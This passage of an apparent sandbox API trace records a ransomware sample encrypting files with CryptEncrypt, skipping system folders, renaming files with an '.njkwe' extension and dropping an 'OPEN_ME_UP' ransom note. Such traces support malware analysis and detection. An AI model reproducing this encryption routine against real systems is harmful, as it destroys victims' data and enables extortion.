lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.802] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.802] CloseHandle (hObject=0x42c) returned 1 [0060.803] GetProcessHeap () returned 0xbe0000 [0060.803] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.803] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.805] GetProcessHeap () returned 0xbe0000 [0060.805] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.805] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.805] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 48 [0060.805] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.805] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.805] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.805] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.805] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.805] GetTickCount () returned 0x114fa20 [0060.806] GetTickCount () returned 0x114fa20 [0060.806] GetTickCount () returned 0x114fa20 [0060.806] GetTickCount () returned 0x114fa20 [0060.806] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.806] GetProcessHeap () returned 0xbe0000 [0060.806] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.806] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.808] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.808] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.808] GetProcessHeap () returned 0xbe0000 [0060.808] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.808] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.808] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.808] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.808] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.808] CloseHandle (hObject=0x42c) returned 1 [0060.811] GetProcessHeap () returned 0xbe0000 [0060.811] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.811] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.811] GetProcessHeap () returned 0xbe0000 [0060.811] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.811] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.811] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.811] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.811] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.811] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.811] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.811] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 49 [0060.811] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.811] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.812] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.812] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.812] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.812] GetTickCount () returned 0x114fa20 [0060.812] GetTickCount () returned 0x114fa20 [0060.812] GetTickCount () returned 0x114fa20 [0060.812] GetTickCount () returned 0x114fa20 [0060.812] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.812] GetProcessHeap () returned 0xbe0000 [0060.812] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.812] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.904] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.904] GetProcessHeap () returned 0xbe0000 [0060.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.904] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.904] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.904] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.905] CloseHandle (hObject=0x42c) returned 1 [0060.906] GetProcessHeap () returned 0xbe0000 [0060.906] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.906] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.906] GetProcessHeap () returned 0xbe0000 [0060.906] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.906] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.907] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0060.907] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.907] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1031\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.908] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.908] CloseHandle (hObject=0x428) returned 1 [0060.909] GetProcessHeap () returned 0xbe0000 [0060.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.909] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1032", cAlternateFileName="")) returned 1 [0060.909] lstrcmpiW (lpString1="1032", lpString2="Windows") returned -1 [0060.909] lstrcmpiW (lpString1="1032", lpString2="$Recycle.bin") returned 1 [0060.909] lstrcmpiW (lpString1="1032", lpString2="System Volume Information") returned -1 [0060.909] lstrcmpiW (lpString1="1032", lpString2="Program Files") returned -1 [0060.909] lstrcmpiW (lpString1="1032", lpString2="Program Files (x86)") returned -1 [0060.909] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032") returned 30 [0060.909] lstrcmpW (lpString1="1032", lpString2=".") returned 1 [0060.909] lstrcmpW (lpString1="1032", lpString2="..") returned 1 [0060.909] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.909] GetProcessHeap () returned 0xbe0000 [0060.909] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.909] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\*") returned 32 [0060.909] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2e0 [0060.910] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.910] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\.") returned 32 [0060.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.910] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.910] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.910] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.910] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.910] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.910] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.910] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\..") returned 33 [0060.910] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.910] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.910] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.910] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.910] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.911] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.911] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.911] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.911] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 39 [0060.911] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.911] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.911] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.911] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.911] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.911] GetTickCount () returned 0x114fa8e [0060.911] GetTickCount () returned 0x114fa8e [0060.911] GetTickCount () returned 0x114fa8e [0060.911] GetTickCount () returned 0x114fa8e [0060.911] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.912] GetProcessHeap () returned 0xbe0000 [0060.912] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.912] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x22ac, lpOverlapped=0x0) returned 1 [0060.913] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffdd54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.913] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x22ac, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x22ac, lpOverlapped=0x0) returned 1 [0060.913] GetProcessHeap () returned 0xbe0000 [0060.913] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.913] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.913] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.913] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.913] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.914] CloseHandle (hObject=0x42c) returned 1 [0060.914] GetProcessHeap () returned 0xbe0000 [0060.914] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.914] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.916] GetProcessHeap () returned 0xbe0000 [0060.916] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.916] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.916] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 48 [0060.916] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.916] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.916] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.916] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.916] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.917] GetTickCount () returned 0x114fa8e [0060.917] GetTickCount () returned 0x114fa8e [0060.917] GetTickCount () returned 0x114fa8e [0060.917] GetTickCount () returned 0x114fa8e [0060.917] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.917] GetProcessHeap () returned 0xbe0000 [0060.917] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.917] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.919] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.919] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.919] GetProcessHeap () returned 0xbe0000 [0060.919] HeapFree (in: 